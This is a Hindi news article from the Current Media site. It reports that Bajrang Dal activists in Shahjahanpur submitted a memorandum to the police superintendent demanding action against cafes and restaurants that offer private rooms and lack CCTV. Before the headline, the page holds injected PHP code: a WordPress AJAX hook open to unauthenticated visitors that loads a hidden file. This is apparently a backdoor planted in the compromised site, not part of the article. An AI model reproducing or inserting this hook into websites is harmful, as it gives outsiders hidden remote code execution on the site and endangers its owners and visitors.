if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"बजरंग दल महानगर की टोली ने पुलिस अधीक्षक शाहजहांपुर को दिया पुनः ज्ञापन" - Current Media

“बजरंग दल महानगर की टोली ने पुलिस अधीक्षक शाहजहांपुर को दिया पुनः ज्ञापन”

शाहजहांपुर । अभिनय गुप्ता । बजरंग दल शाहजीपुर महानगर के कार्यकर्ताओं द्वारा पुलिस अधीक्षक अशोक कुमार मीणा को पुनः ज्ञापन दिया गया।
जिसमें शहर के रेस्टोरेंट,होटलो,कैफे आदि में पुलिस द्वारा निर्देश देने के बाबजूद न तो सीसीटीवी लगाए गए और न ही चैम्बर हटाये गए तथा 14 फरवरी के बाद पुनः नवयुवक-युवतियों से रुपये लेकर प्राइवेट चैंबर या अंदर से ही रूम की व्यवस्था उपलब्ध कराई जा रही है,जिसमें अश्लीलता देखने को मिलती है।
अपनी नासमझी के चलते नाबालिग युवक-युवतियाँ भी इसका शिकार हो रही है। बजरंगदल द्वारा संदिग्ध कैफों व रेस्टोरेंटों आदि के विभन्न नाम भी दिए गए है तथा मांग की गई कि है रेस्टोरेंटो,कैफे जहां सीसीटीवी व प्राइवेट चेम्बर,रूम आदि नही हटाये गए उन पर कठोर कार्यवाही की जाए।
ज्ञापन देने वालों में महानगर संयोजक बजरंगदल अंकित मिश्रा ‘सम्राट‘ ,महानगर प्रचार प्रमुख अनुभव गुप्ता,महानगर गौरक्षा प्रमुख प्रदीप प्रजापति,नगर अध्यक्ष विहिप अजय मिश्रा,नगर अध्यक्ष विहिप भीम प्रकाश गौतम,नगर विद्यार्थी प्रमुख कुनाल राठौर, प्रांजल कश्यप,प्रियांशु सक्सेना,हिमांशु सक्सेना,हर्षित श्रीवास्तव आदि मौजूद रहे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …